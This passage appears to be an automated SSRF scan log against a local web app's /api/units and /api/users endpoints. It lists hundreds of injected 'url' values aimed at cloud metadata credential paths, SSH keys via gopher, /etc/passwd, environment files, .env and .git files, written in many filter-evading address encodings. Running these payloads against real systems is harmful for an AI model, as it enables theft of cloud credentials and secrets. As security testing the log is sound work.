+- Testing: `http://localhost:4200/api/units?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/units?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/units?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/units?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/units?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/units?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/units?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/units?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/units?url=0%2F` +- Testing: `http://localhost:4200/api/units?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/users +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/users?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/users?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/users?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/users?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/users?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/users?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/users?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/users?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/users?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/users?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/users?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/users?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/users?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/users?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/users?url=127.1%3A80` +- Testing: `http://localhost:4200/api/users?url=0` +- Testing: `http://localhost:4200/api/users?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/users?url=localhost%3A80` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/users?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/users?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/users?url=127.127.127.127` +- Testing: `http://localhost:4200/api/users?url=127.0.1.3` +- Testing: `http://localhost:4200/api/users?url=127.0.0.0` +- Testing: `http://localhost:4200/api/users?url=2130706433` +- Testing: `http://localhost:4200/api/users?url=017700000001` +- Testing: `http://localhost:4200/api/users?url=0x7f000001` +- Testing: `http://localhost:4200/api/users?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/users?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/users?url=` +- Testing: `http://localhost:4200/api/users?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/users?url=` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/users?url=` +- Testing: `http://localhost:4200/api/users?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/users?url=` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/users?url=` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/users?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/users?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/users?url=google.com.localhost` +- Testing: `http://localhost:4200/api/users?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/users?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/users?url=` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/users?url=` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/users?url=` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/users?url=localtest.me` +- Testing: `http://localhost:4200/api/users?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/users?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/users?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/users?url=2130706433%2F` +- Testing: `http://localhost:4200/api/users?url=3232235521%2F` +- Testing: `http://localhost:4200/api/users?url=3232235777%2F` +- Testing: `http://localhost:4200/api/users?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/users?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1` +- Testing: `http://localhost:4200/api/users?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/users?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/users?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/users?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/users?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/users?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/users?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/users?url=0%2F` +- Testing: `http://localhost:4200/api/users?url=127.1` +- Testing: `http://localhost:4200/api/users?url=127.0.1` +- Testing: `http://localhost:4200/api/users?url=localtest.me` +- Testing: `http://localhost:4200/api/users?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/users?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/users?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/users?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/users?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/users?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/users?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/users?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/users?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=127.0.1.3` +- Testing: `http://localhost:4200/api/users?url=0` +- Testing: `http://localhost:4200/api/users?url=127.1` +- Testing: `http://localhost:4200/api/users?url=127.0.1` +- Testing: `http://localhost:4200/api/users?url=localhost` +- Testing: `http://localhost:4200/api/users?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/users?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/users?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/users?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/users?url=7F000001` +- Testing: `http://localhost:4200/api/users?url=2130706433` +- Testing: `http://localhost:4200/api/users?url=6425673729` +- Testing: `http://localhost:4200/api/users?url=127001` +- Testing: `http://localhost:4200/api/users?url=127_0._0_1` +- Testing: `http://localhost:4200/api/users?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/users?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/users?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/users?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/users?url=localtest.me` +- Testing: `http://localhost:4200/api/users?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/users?url=127.127.127.127` +- Testing: `http://localhost:4200/api/users?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/users?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/users?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/users?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/users?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/users?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/users?url=0x7f000001` +- Testing: `http://localhost:4200/api/users?url=017700000001` +- Testing: `http://localhost:4200/api/users?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/users?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/users?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/users?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/users?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/users?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/users?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/users?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/users?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/users?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254` +- Testing: `http://localhost:4200/api/users?url=2852039166` +- Testing: `http://localhost:4200/api/users?url=7147006462` +- Testing: `http://localhost:4200/api/users?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/users?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/users?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/users?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/users?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/users?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/users?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/users?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/users?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/users?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/users?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/users?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/users?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/users?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/users?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/users?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/users?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/users?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/users?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/users?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/users?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/users?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/users?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/users?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/users?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/users?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/users?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/users?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/users?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/users?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/users?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/users?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/users?url=127.0.0.0` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/users?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/users?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/users?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/users?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/users?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/users?url=3232235521` +- Testing: `http://localhost:4200/api/users?url=3232235777` +- Testing: `http://localhost:4200/api/users?url=425.510.425.510` +- Testing: `http://localhost:4200/api/users?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/users?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/users?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/users?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/users?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/users?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/users?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/users?url=instance-data` +- Testing: `http://localhost:4200/api/users?url=localhost%3A22` +- Testing: `http://localhost:4200/api/users?url=localhost%3A443` +- Testing: `http://localhost:4200/api/users?url=localhost%3A80` +- Testing: `http://localhost:4200/api/users?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/users?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/users?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/users?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/users?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/users?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/users?url=loopback` +- Testing: `http://localhost:4200/api/users?url=loopback%3A22` +- Testing: `http://localhost:4200/api/users?url=loopback%3A80` +- Testing: `http://localhost:4200/api/users?url=loopback%3A443` +- Testing: `http://localhost:4200/api/users?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/users?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/users?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/users?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/users?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/users?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/users?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/users?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/users?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/users?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/users?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/users?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/users?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/users?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/users?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/users?url=127.1%3A80` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/users?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/users?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/users?url=2130706433%2F` +- Testing: `http://localhost:4200/api/users?url=3232235521%2F` +- Testing: `http://localhost:4200/api/users?url=3232235777%2F` +- Testing: `http://localhost:4200/api/users?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/users?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/users?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/users?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/users?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/users?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/users?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/users?url=localhost%2F%7Bdomain%7D` +- Testing: 